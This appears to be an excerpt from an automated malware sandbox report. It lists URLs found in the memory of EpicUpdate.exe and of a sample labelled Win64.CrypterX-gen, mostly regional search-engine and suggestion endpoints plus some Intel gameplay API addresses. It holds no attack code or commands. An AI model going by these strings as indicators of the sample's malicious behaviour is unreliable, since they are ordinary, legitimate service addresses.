Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://it.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karmasearch.org/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karmasearch.org/favicon.icohttps://karmasearch.org/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karmasearch.org/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://karmasearch.org/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lss.sse-iacapps.com/query?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://malaysia.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://malaysia.search.yahoo.com/favicon.icohttps://malaysia.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://malaysia.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://malaysia.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://metager.de/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://metager.de/favicon.icohttps://metager.de/meta/meta.ger3?eingabe=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://metager.de/meta/meta.ger3?eingabe=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://metager.org/meta/meta.ger3?eingabe=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mx.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mx.search.yahoo.com/favicon.icohttps://mx.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mx.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nl.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nl.search.yahoo.com/favicon.icohttps://nl.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nl.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nl.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nz.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nz.search.yahoo.com/favicon.icohttps://nz.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nz.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nz.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oceanhero.today/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oceanhero.today/favicon.icohttps://oceanhero.today/web?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oceanhero.today/home
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oceanhero.today/web?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://panda-search.org/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://panda-search.org/favicon.icohttps://panda-search.org/search/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://panda-search.org/search/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pe.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pe.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pe.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://petalsearch.com/search?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ph.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ph.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ph.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://presearch.com/api/suggest?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://presearch.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://presearch.com/favicon.icohttps://presearch.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://presearch.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://quendu.com/assets/favicon-48x48.png
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://quendu.com/assets/favicon-48x48.pnghttps://www.quendu.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://se.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://se.search.yahoo.com/favicon.icohttps://se.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://se.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search-static-dre.dbankcdn.com/pc/v1/favicon.icohttps://petalsearch.com/search?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.brave.com/api/suggest?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.brave.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.daum.net/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.daum.net/search?w=tot&DA=JU5&q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.gmx.co.uk/web/result?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.gmx.com/web/result?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.gmx.es/web/result?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.gmx.fr/web/result?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.icohttps://search.goo.ne.jp/web.jsp?MT=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.goo.ne.jp/sgt.jsp?MT=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.goo.ne.jp/web.jsp?MT=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.lilo.org
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.lilo.org/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.lilo.org/api/?service=suggestions&action=suggest&q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.naver.com/search.naver?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.privacywall.org/suggest.php?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.seznam.cz/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.seznam.cz/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.seznam.cz/favicon.icohttps://search.seznam.cz/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.seznam.cz/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.co.jp/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.co.jp/favicon.icohttps://search.yahoo.co.jp/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.co.jp/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?p=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchatlas.centrum.cz/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchatlas.centrum.cz/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://searchatlas.centrum.cz/favicon.icohttps://searchatlas.centrum.cz/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sg.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sg.search.yahoo.com/favicon.icohttps://sg.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sg.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sg.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp, EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.icohttps://search.naver.com/search.nav
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable-xxhdpi/yandex.png
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suche.gmx.at/web/result?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suche.gmx.net/web/result?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sug.so.360.cn/suggest?encodein=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sugg.sogou.com/sugg/ajaj_json.jsp?type=addrbar&key=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.panda-search.org/suggest?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.search.daum.net/sushi/opensearch/pc?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.seznam.cz/fulltext_ff?phrase=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.yandex.by/suggest-ff.cgi?part=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.yandex.com.tr/suggest-ff.cgi?part=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.yandex.com/suggest-ff.cgi?part=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.yandex.kz/suggest-ff.cgi?part=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggest.yandex.ua/suggest-ff.cgi?part=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestion.baidu.com/su?wd=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestplugin.gmx.at/s?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestplugin.gmx.co.uk/s?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestplugin.gmx.com/s?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestplugin.gmx.es/s?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestplugin.gmx.fr/s?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggestplugin.gmx.net/s?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://suggests.go.mail.ru/chrome?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://th.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://th.search.yahoo.com/favicon.icohttps://th.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://th.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://th.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.search.yahoo.com/favicon.icohttps://tr.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tr.search.yahoo.com/search
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/$f3O
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/nf
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2E81000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/q
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2E62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC317F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/s
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/u
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2E62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2E81000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3088000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC317F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgames2/
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3088000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC317F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3081000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/5
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/u
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tw.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tw.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tw.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
